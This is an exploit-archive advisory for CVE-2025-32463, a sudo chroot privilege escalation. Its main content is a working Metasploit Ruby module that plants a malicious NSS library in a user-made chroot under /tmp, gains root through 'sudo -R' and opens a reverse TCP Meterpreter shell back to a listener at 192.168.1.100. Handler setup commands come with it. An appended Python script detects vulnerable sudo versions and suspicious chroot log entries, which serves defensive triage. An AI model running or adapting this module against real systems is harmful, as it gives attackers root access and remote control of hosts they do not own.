=============================================================================================================================================
| # Title     : sudo 1.9.17 Sudo Chroot Privilege Escalation
| # Author    : indoushka
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)
| # Vendor    : https://www.sudo.ws/
=============================================================================================================================================

[+] Summary :

This Metasploit module exploits CVE-2025-32463, a local privilege escalation vulnerability in Sudo's chroot functionality. The vulnerability allows attackers to load malicious NSS (Name Service Switch) modules from within a chroot environment, leading to arbitrary code execution as root.

[+] Integration Methods :

1. **Standalone Exploit Module**
   - Custom Ruby module for direct exploitation
   - Automated chroot environment setup
   - Payload execution as root

2. **Payload Integration**
   - Modified NSS module with Meterpreter payload
   - Reverse TCP connection establishment
   - Root-level Meterpreter session

3. **Multi-Handler Approach**
   - External exploit triggering Meterpreter
   - Payload delivery via HTTP/SMB
   - Session management through handler

[+] Module Components :

**Core Functions:**

- `check()`: Verifies sudo chroot capability
- `exploit()`: Main exploitation routine
- `generate_nss_module()`: Creates malicious NSS library
- `compile_nss_module()`: Compiles shared object

**Exploitation Flow:**

1. Vulnerability verification
2. Chroot environment creation
3. Malicious NSS module generation
4. Payload integration
5. Privilege escalation trigger
6. Meterpreter session establishment

[+] Usage :

    use exploit/linux/local/sudo_chroot_priv_esc
    set SESSION 1
    set LHOST 192.168.1.100
    set LPORT 4444
    exploit

or save as : sudo_chroot_exploit.rb

    use exploit/multi/handler
    set PAYLOAD linux/x64/meterpreter/reverse_tcp
    set LHOST 192.168.1.100
    set LPORT 4444
    set ExitOnSession false
    exploit -j

[+] POC :

```ruby
##
# Module for CVE-2025-32463 Sudo Chroot Privilege Escalation
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sudo Chroot NSS Privilege Escalation (CVE-2025-32463)',
      'Description'    => %q{
        This module exploits CVE-2025-32463, a privilege escalation
        vulnerability in sudo's chroot functionality that allows loading
        malicious NSS modules.
      },
      'License'        => MSF_LICENSE,
      'Author'         => ['indoushka'],
      'References'     => [
        ['CVE', '2025-32463']
      ],
      'Platform'       => ['linux'],
      'Arch'           => [ARCH_X64, ARCH_X86],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Automatic', {}]],
      'DefaultOptions' => {
        'PAYLOAD'       => 'linux/x64/meterpreter/reverse_tcp',
        'PrependSetuid' => true
      },
      'DisclosureDate' => '2025-11-26',
      'DefaultTarget'  => 0
    ))

    register_options([
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ])
  end

  # Step 1: vulnerability verification (looks for a chroot entry in `sudo -l` output)
  def check
    if command_exists?('sudo')
      check_cmd = 'sudo -n -l | grep -i chroot'
      result = cmd_exec(check_cmd)
      if result =~ /chroot/
        return Exploit::CheckCode::Appears
      else
        return Exploit::CheckCode::Safe
      end
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    # Step 2: chroot environment creation under the writable directory
    working_dir = "#{datastore['WritableDir']}/.chroot_exploit"
    cmd_exec("mkdir -p #{working_dir}/{lib,etc,bin}")

    # Step 3: malicious NSS module generation
    nss_payload = generate_nss_module

    # nsswitch.conf inside the chroot points the passwd database at the "Xfiles" module
    nsswitch_conf = "passwd: Xfiles\ngroup: files\nshadow: files\n"
    write_file("#{working_dir}/etc/nsswitch.conf", nsswitch_conf)

    if compile_nss_module(working_dir, nss_payload)
      print_status("Malicious NSS module compiled successfully")
      print_status("Triggering privilege escalation...")
      # Step 5: privilege escalation trigger
      cmd_exec("sudo -R #{working_dir} /bin/id")

      whoami = cmd_exec('whoami')
      if whoami =~ /root/
        print_good("Successfully obtained root privileges!")
        print_status("Executing payload as root...")
        cmd_exec("/bin/bash -c \"#{payload.encoded}\"")
      else
        print_error("Privilege escalation failed")
      end
    else
      print_error("Failed to compile NSS module")
    end

    cmd_exec("rm -rf #{working_dir}")
  end

  # Step 4: payload integration; the payload is dropped to disk and launched from
  # the shared object's constructor
  def generate_nss_module
    payload_file = "/tmp/.msf_payload"
    write_file(payload_file, payload.encoded)
    cmd_exec("chmod +x #{payload_file}")

    nss_code = %Q{
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <nss.h>
#include <pwd.h>

__attribute__((constructor))
void init() {
    unsetenv("LD_PRELOAD");
    setuid(0);
    setgid(0);
    system("#{payload_file} &");
    system("rm -f #{payload_file}");
}

enum nss_status _nss_Xfiles_getpwnam_r(const char *name, struct passwd *pwd,
                                       char *buf, size_t buflen, int *errnop) {
    return NSS_STATUS_NOTFOUND;
}
}
    return nss_code
  end

  def compile_nss_module(working_dir, source_code)
    source_file = "#{working_dir}/payload.c"
    output_file = "#{working_dir}/lib/libnss_Xfiles.so.2"

    write_file(source_file, source_code)

    compile_cmd = "gcc -fPIC -shared -o #{output_file} #{source_file} -nostartfiles"
    result = cmd_exec(compile_cmd)

    # Cleanup source
    cmd_exec("rm -f #{source_file}")

    return file_exist?(output_file)
  end

  def command_exists?(cmd)
    result = cmd_exec("which #{cmd}")
    return result.include?('/')
  end
end
```

=============================================================================================================================================
Greetings to : jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx) |
=============================================================================================================================================
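The module's `check()` above only greps `sudo -l` for the word "chroot", which says nothing about whether the installed sudo is actually in the affected range, and the page offers nothing for spotting an invocation of this shape after the fact. The following Python script is an added defender-side example; it is not part of this advisory or of the module. It assumes the affected range published in the sudo advisory (1.9.14 through 1.9.17, fixed in 1.9.17p1), that the `sudo --version` banner starts with "Sudo version", and that sudoers logs a `CHROOT=` field when `sudo -R` is used; the log lines it scans are constructed for the example and mirror the `/tmp/.chroot_exploit` working directory the module defaults to.

```python
"""Triage helpers for CVE-2025-32463 (sudo chroot / NSS module loading).

Added example, not the advisory's or the module's own code. Two checks that
run offline against collected data:

1. is_affected_sudo(): parse the `sudo --version` banner and decide whether
   the version falls in the affected range 1.9.14 .. 1.9.17 inclusive (the
   fix shipped in 1.9.17p1, so a patch level lifts 1.9.17 out of the range).
2. find_chroot_invocations(): scan sudo log lines for CHROOT= entries whose
   root directory lies under a user-writable location, which is the shape
   of invocation the module above produces (sudo -R <writable dir>).
"""
import re

# "Sudo version 1.9.17p1" -> major, minor, patch, optional p-level
VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?")

AFFECTED_LOW = (1, 9, 14, 0)   # first affected release
AFFECTED_HIGH = (1, 9, 17, 0)  # last affected release; 1.9.17p1 is fixed


def parse_sudo_version(banner):
    """Return (major, minor, patch, plevel) from a `sudo --version` banner, or None."""
    m = VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel) if plevel else 0)


def is_affected_sudo(banner):
    """True if the banner's version is in the affected range, False if not,
    None if no version could be parsed."""
    v = parse_sudo_version(banner)
    if v is None:
        return None
    return AFFECTED_LOW <= v <= AFFECTED_HIGH


# Field layout assumed from sudoers' syslog format:
#   sudo:    user : TTY=pts/0 ; CHROOT=/dir ; PWD=/x ; USER=root ; COMMAND=/bin/id
SUDO_LOG_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s*:.*?\bCHROOT=(?P<root>\S+).*?\bCOMMAND=(?P<cmd>.*)$"
)

# Locations an unprivileged user can normally populate with a fake /etc and /lib
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def find_chroot_invocations(lines, prefixes=WRITABLE_PREFIXES):
    """Return (user, chroot_dir, command) for every sudo log line that ran a
    command chrooted into a directory under one of `prefixes`."""
    hits = []
    for line in lines:
        m = SUDO_LOG_RE.search(line)
        if not m:
            continue
        root = m.group("root")
        if root.startswith(prefixes):
            hits.append((m.group("user"), root, m.group("cmd").strip()))
    return hits


# Constructed sample log lines for the example (not captured from a real host)
SAMPLE_LOG = [
    "Nov 26 09:12:01 host sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update",
    "Nov 26 09:13:44 host sudo:      bob : TTY=pts/1 ; CHROOT=/tmp/.chroot_exploit ; PWD=/tmp ; USER=root ; COMMAND=/bin/id",
    "Nov 26 09:15:10 host sudo:    carol : TTY=pts/2 ; CHROOT=/srv/buildroot ; PWD=/srv ; USER=root ; COMMAND=/bin/sh",
]


if __name__ == "__main__":
    for banner in ("Sudo version 1.9.17", "Sudo version 1.9.17p1"):
        print(banner, "-> affected:", is_affected_sudo(banner))
    for user, root, cmd in find_chroot_invocations(SAMPLE_LOG):
        print(f"suspicious chroot: user={user} root={root} command={cmd}")
```

The version check compares tuples, so a patch level sorts after the bare release and 1.9.17p1 correctly falls outside the range. Treat a "not affected" result as a hint rather than proof: distributions often backport the fix without changing the version string, so confirm against the distro's own security tracker. The log scan keys on the chroot directory rather than on the command, because the command that triggers the module (`/bin/id` in the POC) is arbitrary; what is unusual is a root-level command executed under a chroot that lives somewhere an ordinary user could have written.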